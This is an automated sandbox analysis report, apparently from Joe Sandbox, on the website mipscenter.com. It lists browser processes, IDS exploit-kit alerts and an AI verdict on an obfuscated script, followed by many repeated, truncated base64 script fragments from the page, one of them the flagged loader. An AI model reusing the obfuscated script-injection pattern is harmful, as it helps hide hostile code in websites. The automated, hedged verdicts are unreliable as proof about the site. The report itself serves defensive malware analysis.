Edit tour

Windows Analysis Report
https://mipscenter.com

Overview

General Information

Sample URL:https://mipscenter.com
Analysis ID:1650686
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML page contains obfuscated javascript
Creates files inside the system directory
Deletes files inside the Windows folder
HTML page contains hidden javascript code
HTML page contains obfuscated script src
Suricata IDS alerts with low severity for network traffic

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 3264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,2287647496574530764,16492952438617208269,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1876,i,2287647496574530764,16492952438617208269,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6436 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,2287647496574530764,16492952438617208269,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mipscenter.com" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-27T22:45:13.762330+010020221121Exploit Kit Activity Detected192.168.2.174987823.48.224.108443TCP
2025-03-27T22:45:13.813657+010020221121Exploit Kit Activity Detected192.168.2.174987723.48.224.108443TCP
2025-03-27T22:45:14.847550+010020221121Exploit Kit Activity Detected192.168.2.174989123.48.224.108443TCP
2025-03-27T22:45:15.056766+010020221121Exploit Kit Activity Detected192.168.2.174989023.48.224.108443TCP
2025-03-27T22:45:25.789317+010020221121Exploit Kit Activity Detected192.168.2.174996023.48.224.108443TCP
2025-03-27T22:45:26.256145+010020221121Exploit Kit Activity Detected192.168.2.174996723.48.224.108443TCP

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://mipscenter.com/Joe Sandbox AI: Page contains button: 'OUR REVIEWS' Source: '0.12.pages.csv'
Source: 0.3..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: data:text/javascript;base64,SVNWYUY9IlpuVnVZM1JwYj... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. The use of `eval`, `Function` constructor, and heavily encoded strings indicates a high likelihood of malicious intent. Additionally, the script appears to be sending user data to external, potentially untrusted domains, which poses a significant risk of data theft or other malicious activities. Overall, this script exhibits a clear pattern of suspicious and potentially harmful behavior, warranting a high-risk score.
Source: https://mipscenter.com/HTTP Parser: (function anonymous() {function J(z,c){const E=o();return J=function(F,V){F=F-(-0x7*-0x4d6+0xf8a+-
Source: https://mipscenter.com/HTTP Parser: Base64 decoded: ISVaF="ZnVuY3Rpb24gSih6LGMpe2NvbnN0IEU9bygpO3JldHVybiBKPWZ1bmN0aW9uKEYsVil7Rj1GLSgtMHg3Ki0weDRkNisweGY4YSstMHgzMDI2KjB4MSk7bGV0IEI9RVtGXTtyZXR1cm4gQjt9LEooeixjKTt9KGZ1bmN0aW9uKHosYyl7ZnVuY3Rpb24geCh6LGMsRSxGLFYpe3JldHVybiBKKHotIC0weDE5LFYpO31mdW5jdGlvbiBQ...
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,SVNWYUY9IlpuVnVZM1JwYjI0Z1NpaDZMR01wZTJOdmJuTjBJRVU5YnlncE8zSmxkSFZ5YmlCS1BXWjFibU4wYVc5dUtFWXNWaWw3UmoxR0xTZ3RNSGczS2kwd2VEUmtOaXN3ZUdZNFlTc3RNSGd6TURJMktqQjRNU2s3YkdWMElFSTlSVnRHWFR0eVpYUjFjbTRnUWp0OUxFb29laXhqS1R0OUtHWj
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQogIHdpbmRvdy5kYXRhTGF5ZXIgPSB3aW5kb3cuZGF0YUxheWVyIHx8IFtdOw0KICBmdW5jdGlvbiBndGFnKCl7ZGF0YUxheWVyLnB1c2goYXJndW1lbnRzKTt9DQogIGd0YWcoJ2pzJywgbmV3IERhdGUoKSk7DQoNCiAgZ3RhZygnY29uZmlnJywgJ0FXLTExMDYwNzUwMjg3Jyk7DQo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQpmdW5jdGlvbiBndGFnX3JlcG9ydF9jb252ZXJzaW9uKHVybCkgew0KICB2YXIgY2FsbGJhY2sgPSBmdW5jdGlvbiAoKSB7DQogICAgaWYgKHR5cGVvZih1cmwpICE9ICd1bmRlZmluZWQnKSB7DQogICAgICB3aW5kb3cubG9jYXRpb24gPSB1cmw7DQogICAgfQ0KICB9Ow0KICBndGFnKCdldm
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2xvYWQnLCBmdW5jdGlvbigpIHsNCiAgdmFyIGtleSA9ICc5NkFDMDE0QS03NkFGLTRDQjgtQUM1Ri05RTdFRjZFMDk3NjUnOw0KICBPaE1EV2lkZ2V0LmluaXRpYWxpemUoa2V5KTsNCn0pOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmNyd3BWZXIgPSAxOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgY29ibG9ja3NUaW55c3dpcGVyID0geyJjYXJvdXNlbFByZXZCdXR0b25BcmlhTGFiZWwiOiJQcmV2aW91cyIsImNhcm91c2VsTmV4dEJ1dHRvbkFyaWFMYWJlbCI6Ik5leHQiLCJzbGlkZXJJbWFnZUFyaWFMYWJlbCI6IkltYWdlIn07Ci8qIF1dPiAqLwo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgcGhwX3ZhcnMgPSB7ImJhbm5lcl9hbmltYXRpb25fY2xhc3MiOiJub25lIiwiYnV0dG9uX2FuaW1hdGlvbl9jbGFzcyI6InB1bHNlIiwiY2FsbG91dF9hbmltYXRpb25fY2xhc3MiOiJub25lIiwibGlua19pY29ucyI6IjEifTsKLyogXV0+ICovCg==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKCQsIHJvb3QsIHVuZGVmaW5lZCkgeyAkKGZ1bmN0aW9uKCkgeyANCiAgICAgICAgICAgICAgICAgICAgICAgICQoJyNwcmFjdGlzX3BvcHVwc18zNDM2JykucG9wdXAoew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNldHppbmRleDogdHJ1ZSwNCiAgICAgICAgICAgIC
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZxIHx8ICh3aW5kb3cuX3RyZnEgPSBbXSk7J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZkICYmICh3aW5kb3cuX3RyZmQ9W10pLAogICAgICAgICAgICAgICAgX3RyZmQucHVzaCh7J3RjY2wuYmFzZUhvc3QnOidzZWN1cmVzZXJ2ZXIubmV0J30pLA
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2NsaWNrJywgZnVuY3Rpb24gKGVsZW0pIHsgdmFyIF9lbGVtJHRhcmdldCwgX2VsZW0kdGFyZ2V0JGRhdGFzZXQsIF93aW5kb3csIF93aW5kb3ckX3RyZnE7IHJldHVybiAoZWxlbSA9PT0gbnVsbCB8fCBlbGVtID09PSB2b2lkIDAgPyB2b2lkIDAgOi
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,SVNWYUY9IlpuVnVZM1JwYjI0Z1NpaDZMR01wZTJOdmJuTjBJRVU5YnlncE8zSmxkSFZ5YmlCS1BXWjFibU4wYVc5dUtFWXNWaWw3UmoxR0xTZ3RNSGczS2kwd2VEUmtOaXN3ZUdZNFlTc3RNSGd6TURJMktqQjRNU2s3YkdWMElFSTlSVnRHWFR0eVpYUjFjbTRnUWp0OUxFb29laXhqS1R0OUtHWj
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQogIHdpbmRvdy5kYXRhTGF5ZXIgPSB3aW5kb3cuZGF0YUxheWVyIHx8IFtdOw0KICBmdW5jdGlvbiBndGFnKCl7ZGF0YUxheWVyLnB1c2goYXJndW1lbnRzKTt9DQogIGd0YWcoJ2pzJywgbmV3IERhdGUoKSk7DQoNCiAgZ3RhZygnY29uZmlnJywgJ0FXLTExMDYwNzUwMjg3Jyk7DQo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQpmdW5jdGlvbiBndGFnX3JlcG9ydF9jb252ZXJzaW9uKHVybCkgew0KICB2YXIgY2FsbGJhY2sgPSBmdW5jdGlvbiAoKSB7DQogICAgaWYgKHR5cGVvZih1cmwpICE9ICd1bmRlZmluZWQnKSB7DQogICAgICB3aW5kb3cubG9jYXRpb24gPSB1cmw7DQogICAgfQ0KICB9Ow0KICBndGFnKCdldm
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2xvYWQnLCBmdW5jdGlvbigpIHsNCiAgdmFyIGtleSA9ICc5NkFDMDE0QS03NkFGLTRDQjgtQUM1Ri05RTdFRjZFMDk3NjUnOw0KICBPaE1EV2lkZ2V0LmluaXRpYWxpemUoa2V5KTsNCn0pOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmNyd3BWZXIgPSAxOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgY29ibG9ja3NUaW55c3dpcGVyID0geyJjYXJvdXNlbFByZXZCdXR0b25BcmlhTGFiZWwiOiJQcmV2aW91cyIsImNhcm91c2VsTmV4dEJ1dHRvbkFyaWFMYWJlbCI6Ik5leHQiLCJzbGlkZXJJbWFnZUFyaWFMYWJlbCI6IkltYWdlIn07Ci8qIF1dPiAqLwo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgcGhwX3ZhcnMgPSB7ImJhbm5lcl9hbmltYXRpb25fY2xhc3MiOiJub25lIiwiYnV0dG9uX2FuaW1hdGlvbl9jbGFzcyI6InB1bHNlIiwiY2FsbG91dF9hbmltYXRpb25fY2xhc3MiOiJub25lIiwibGlua19pY29ucyI6IjEifTsKLyogXV0+ICovCg==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKCQsIHJvb3QsIHVuZGVmaW5lZCkgeyAkKGZ1bmN0aW9uKCkgeyANCiAgICAgICAgICAgICAgICAgICAgICAgICQoJyNwcmFjdGlzX3BvcHVwc18zNDM2JykucG9wdXAoew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNldHppbmRleDogdHJ1ZSwNCiAgICAgICAgICAgIC
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZxIHx8ICh3aW5kb3cuX3RyZnEgPSBbXSk7J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZkICYmICh3aW5kb3cuX3RyZmQ9W10pLAogICAgICAgICAgICAgICAgX3RyZmQucHVzaCh7J3RjY2wuYmFzZUhvc3QnOidzZWN1cmVzZXJ2ZXIubmV0J30pLA
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2NsaWNrJywgZnVuY3Rpb24gKGVsZW0pIHsgdmFyIF9lbGVtJHRhcmdldCwgX2VsZW0kdGFyZ2V0JGRhdGFzZXQsIF93aW5kb3csIF93aW5kb3ckX3RyZnE7IHJldHVybiAoZWxlbSA9PT0gbnVsbCB8fCBlbGVtID09PSB2b2lkIDAgPyB2b2lkIDAgOi
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,SVNWYUY9IlpuVnVZM1JwYjI0Z1NpaDZMR01wZTJOdmJuTjBJRVU5YnlncE8zSmxkSFZ5YmlCS1BXWjFibU4wYVc5dUtFWXNWaWw3UmoxR0xTZ3RNSGczS2kwd2VEUmtOaXN3ZUdZNFlTc3RNSGd6TURJMktqQjRNU2s3YkdWMElFSTlSVnRHWFR0eVpYUjFjbTRnUWp0OUxFb29laXhqS1R0OUtHWj
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQogIHdpbmRvdy5kYXRhTGF5ZXIgPSB3aW5kb3cuZGF0YUxheWVyIHx8IFtdOw0KICBmdW5jdGlvbiBndGFnKCl7ZGF0YUxheWVyLnB1c2goYXJndW1lbnRzKTt9DQogIGd0YWcoJ2pzJywgbmV3IERhdGUoKSk7DQoNCiAgZ3RhZygnY29uZmlnJywgJ0FXLTExMDYwNzUwMjg3Jyk7DQo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQpmdW5jdGlvbiBndGFnX3JlcG9ydF9jb252ZXJzaW9uKHVybCkgew0KICB2YXIgY2FsbGJhY2sgPSBmdW5jdGlvbiAoKSB7DQogICAgaWYgKHR5cGVvZih1cmwpICE9ICd1bmRlZmluZWQnKSB7DQogICAgICB3aW5kb3cubG9jYXRpb24gPSB1cmw7DQogICAgfQ0KICB9Ow0KICBndGFnKCdldm
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2xvYWQnLCBmdW5jdGlvbigpIHsNCiAgdmFyIGtleSA9ICc5NkFDMDE0QS03NkFGLTRDQjgtQUM1Ri05RTdFRjZFMDk3NjUnOw0KICBPaE1EV2lkZ2V0LmluaXRpYWxpemUoa2V5KTsNCn0pOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmNyd3BWZXIgPSAxOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgY29ibG9ja3NUaW55c3dpcGVyID0geyJjYXJvdXNlbFByZXZCdXR0b25BcmlhTGFiZWwiOiJQcmV2aW91cyIsImNhcm91c2VsTmV4dEJ1dHRvbkFyaWFMYWJlbCI6Ik5leHQiLCJzbGlkZXJJbWFnZUFyaWFMYWJlbCI6IkltYWdlIn07Ci8qIF1dPiAqLwo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgcGhwX3ZhcnMgPSB7ImJhbm5lcl9hbmltYXRpb25fY2xhc3MiOiJub25lIiwiYnV0dG9uX2FuaW1hdGlvbl9jbGFzcyI6InB1bHNlIiwiY2FsbG91dF9hbmltYXRpb25fY2xhc3MiOiJub25lIiwibGlua19pY29ucyI6IjEifTsKLyogXV0+ICovCg==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKCQsIHJvb3QsIHVuZGVmaW5lZCkgeyAkKGZ1bmN0aW9uKCkgeyANCiAgICAgICAgICAgICAgICAgICAgICAgICQoJyNwcmFjdGlzX3BvcHVwc18zNDM2JykucG9wdXAoew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNldHppbmRleDogdHJ1ZSwNCiAgICAgICAgICAgIC
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZxIHx8ICh3aW5kb3cuX3RyZnEgPSBbXSk7J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZkICYmICh3aW5kb3cuX3RyZmQ9W10pLAogICAgICAgICAgICAgICAgX3RyZmQucHVzaCh7J3RjY2wuYmFzZUhvc3QnOidzZWN1cmVzZXJ2ZXIubmV0J30pLA
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2NsaWNrJywgZnVuY3Rpb24gKGVsZW0pIHsgdmFyIF9lbGVtJHRhcmdldCwgX2VsZW0kdGFyZ2V0JGRhdGFzZXQsIF93aW5kb3csIF93aW5kb3ckX3RyZnE7IHJldHVybiAoZWxlbSA9PT0gbnVsbCB8fCBlbGVtID09PSB2b2lkIDAgPyB2b2lkIDAgOi
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,SVNWYUY9IlpuVnVZM1JwYjI0Z1NpaDZMR01wZTJOdmJuTjBJRVU5YnlncE8zSmxkSFZ5YmlCS1BXWjFibU4wYVc5dUtFWXNWaWw3UmoxR0xTZ3RNSGczS2kwd2VEUmtOaXN3ZUdZNFlTc3RNSGd6TURJMktqQjRNU2s3YkdWMElFSTlSVnRHWFR0eVpYUjFjbTRnUWp0OUxFb29laXhqS1R0OUtHWj
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQogIHdpbmRvdy5kYXRhTGF5ZXIgPSB3aW5kb3cuZGF0YUxheWVyIHx8IFtdOw0KICBmdW5jdGlvbiBndGFnKCl7ZGF0YUxheWVyLnB1c2goYXJndW1lbnRzKTt9DQogIGd0YWcoJ2pzJywgbmV3IERhdGUoKSk7DQoNCiAgZ3RhZygnY29uZmlnJywgJ0FXLTExMDYwNzUwMjg3Jyk7DQo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQpmdW5jdGlvbiBndGFnX3JlcG9ydF9jb252ZXJzaW9uKHVybCkgew0KICB2YXIgY2FsbGJhY2sgPSBmdW5jdGlvbiAoKSB7DQogICAgaWYgKHR5cGVvZih1cmwpICE9ICd1bmRlZmluZWQnKSB7DQogICAgICB3aW5kb3cubG9jYXRpb24gPSB1cmw7DQogICAgfQ0KICB9Ow0KICBndGFnKCdldm
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2xvYWQnLCBmdW5jdGlvbigpIHsNCiAgdmFyIGtleSA9ICc5NkFDMDE0QS03NkFGLTRDQjgtQUM1Ri05RTdFRjZFMDk3NjUnOw0KICBPaE1EV2lkZ2V0LmluaXRpYWxpemUoa2V5KTsNCn0pOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmNyd3BWZXIgPSAxOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgY29ibG9ja3NUaW55c3dpcGVyID0geyJjYXJvdXNlbFByZXZCdXR0b25BcmlhTGFiZWwiOiJQcmV2aW91cyIsImNhcm91c2VsTmV4dEJ1dHRvbkFyaWFMYWJlbCI6Ik5leHQiLCJzbGlkZXJJbWFnZUFyaWFMYWJlbCI6IkltYWdlIn07Ci8qIF1dPiAqLwo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgcGhwX3ZhcnMgPSB7ImJhbm5lcl9hbmltYXRpb25fY2xhc3MiOiJub25lIiwiYnV0dG9uX2FuaW1hdGlvbl9jbGFzcyI6InB1bHNlIiwiY2FsbG91dF9hbmltYXRpb25fY2xhc3MiOiJub25lIiwibGlua19pY29ucyI6IjEifTsKLyogXV0+ICovCg==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKCQsIHJvb3QsIHVuZGVmaW5lZCkgeyAkKGZ1bmN0aW9uKCkgeyANCiAgICAgICAgICAgICAgICAgICAgICAgICQoJyNwcmFjdGlzX3BvcHVwc18zNDM2JykucG9wdXAoew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNldHppbmRleDogdHJ1ZSwNCiAgICAgICAgICAgIC
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZxIHx8ICh3aW5kb3cuX3RyZnEgPSBbXSk7J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZkICYmICh3aW5kb3cuX3RyZmQ9W10pLAogICAgICAgICAgICAgICAgX3RyZmQucHVzaCh7J3RjY2wuYmFzZUhvc3QnOidzZWN1cmVzZXJ2ZXIubmV0J30pLA
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2NsaWNrJywgZnVuY3Rpb24gKGVsZW0pIHsgdmFyIF9lbGVtJHRhcmdldCwgX2VsZW0kdGFyZ2V0JGRhdGFzZXQsIF93aW5kb3csIF93aW5kb3ckX3RyZnE7IHJldHVybiAoZWxlbSA9PT0gbnVsbCB8fCBlbGVtID09PSB2b2lkIDAgPyB2b2lkIDAgOi
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,SVNWYUY9IlpuVnVZM1JwYjI0Z1NpaDZMR01wZTJOdmJuTjBJRVU5YnlncE8zSmxkSFZ5YmlCS1BXWjFibU4wYVc5dUtFWXNWaWw3UmoxR0xTZ3RNSGczS2kwd2VEUmtOaXN3ZUdZNFlTc3RNSGd6TURJMktqQjRNU2s3YkdWMElFSTlSVnRHWFR0eVpYUjFjbTRnUWp0OUxFb29laXhqS1R0OUtHWj
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
